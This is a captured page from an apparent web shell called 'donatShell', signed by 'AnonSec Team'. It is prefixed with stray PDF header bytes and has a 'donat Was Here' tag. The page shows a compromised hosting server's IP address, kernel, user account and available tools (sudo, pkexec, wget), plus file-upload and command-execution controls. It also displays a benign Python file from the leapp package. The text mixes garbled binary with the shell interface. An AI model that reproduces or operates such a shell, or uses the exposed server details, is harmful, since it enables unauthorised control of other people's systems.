%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY donat Was Here
donatShell
Server IP : 188.40.95.74  /  Your IP : 216.73.216.205
Web Server : Apache
System : Linux cp01.striminghost.net 3.10.0-1160.119.1.el7.tuxcare.els13.x86_64 #1 SMP Fri Nov 22 06:29:45 UTC 2024 x86_64
User : vlasotin ( 1054)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python2.7/site-packages/leapp/utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python2.7/site-packages/leapp/utils/actorapi.py
import os
import socket

import requests
import requests.adapters
import requests.exceptions

try:
    import requests.packages.urllib3 as urllib3  # noqa # pylint: disable=consider-using-from-import
except ImportError:
    import urllib3


# Alias of requests.exceptions.RequestException exposed under this module's namespace.
RequestException = requests.exceptions.RequestException
"""
Exceptions that are raised through the actor API, which is retrieved from :py:func:`get_actor_api`
"""
# Module-level cache for the session built by get_actor_api(); stays None until the first call.
_session = None


class _LeappAPIConnection(urllib3.connection.HTTPConnection):
    """
    HTTP connection that is carried over a UNIX domain socket instead of a TCP socket.

    The base class is always initialized with the host ``'localhost'``; the actual endpoint is the socket
    path resolved in :py:meth:`connect`.
    """

    def __init__(self, timeout=60):
        """
        :param timeout: Timeout in seconds that is applied to the UNIX socket in :py:meth:`connect`
        """
        self.sock = None
        super(_LeappAPIConnection, self).__init__('localhost', timeout=timeout)
        self.timeout = timeout

    def connect(self):
        """
        Opens the UNIX domain socket and stores it in ``self.sock``.

        The socket path is read from the ``LEAPP_ACTOR_API`` environment variable and falls back to
        ``/tmp/actors.sock`` when the variable is not set.

        :raises socket.error: If the socket cannot be connected; the socket is closed before re-raising
        """
        socket_path = os.environ.get('LEAPP_ACTOR_API', '/tmp/actors.sock')
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.settimeout(self.timeout)
            sock.connect(socket_path)
        except Exception:
            # Do not leak the file descriptor when the endpoint is missing or refuses the connection.
            sock.close()
            raise
        self.sock = sock


class _LeappAPIConnectionPool(urllib3.connectionpool.HTTPConnectionPool):
    """
    Connection pool whose connections are :py:class:`_LeappAPIConnection` instances.
    """

    def __init__(self, timeout=60):
        """
        :param timeout: Timeout that is handed to every connection created by this pool
        """
        super(_LeappAPIConnectionPool, self).__init__(host='localhost')
        # Assigned after the base initializer has run, so this plain value is what _new_conn passes on.
        self.timeout = timeout

    def _new_conn(self):
        """
        :return: A new :py:class:`_LeappAPIConnection` that uses the timeout of this pool
        """
        connection = _LeappAPIConnection(timeout=self.timeout)
        return connection


class _LeappAPIAdapter(requests.adapters.HTTPAdapter):
    """
    Transport adapter that serves every request through a :py:class:`_LeappAPIConnectionPool`.
    """

    def __init__(self, timeout=60):
        """
        :param timeout: Timeout that is passed to the connection pools created by this adapter
        """
        super(_LeappAPIAdapter, self).__init__()
        self.timeout = timeout

    def get_connection(self, url, proxies=None):
        """
        :param url: Ignored; the endpoint does not depend on the requested URL
        :param proxies: Ignored
        :return: A new :py:class:`_LeappAPIConnectionPool` configured with the timeout of this adapter
        """
        return _LeappAPIConnectionPool(timeout=self.timeout)

    def get_connection_with_tls_context(self, request, verify, proxies=None, cert=None):
        """
        Connection hook that requests >= 2.32.0 calls from ``send()`` instead of :py:meth:`get_connection`.

        Without this override newer requests versions would bypass :py:meth:`get_connection` and try to
        resolve the ``leapp://`` URL through the default pool manager. ``verify`` and ``cert`` are ignored.

        :return: The same kind of pool as returned by :py:meth:`get_connection`
        """
        return self.get_connection(request.url, proxies)

    def request_url(self, request, proxies):
        """
        :return: Only the path part (including the query string) of the request URL
        """
        return request.path_url


def get_actor_api():
    """
    Provides the shared Leapp actor API session, creating it on the first call.

    :return: An instance of the Leapp actor API session that is using :py:class:`requests.Session` over a
             UNIX domain socket
    """
    global _session
    if not _session:
        # First use: build the session, drop the default adapters and serve only the leapp:// scheme.
        _session = requests.session()
        _session.adapters.clear()
        _session.mount('leapp://', _LeappAPIAdapter())
    return _session

Anon7 - 2022
AnonSec Team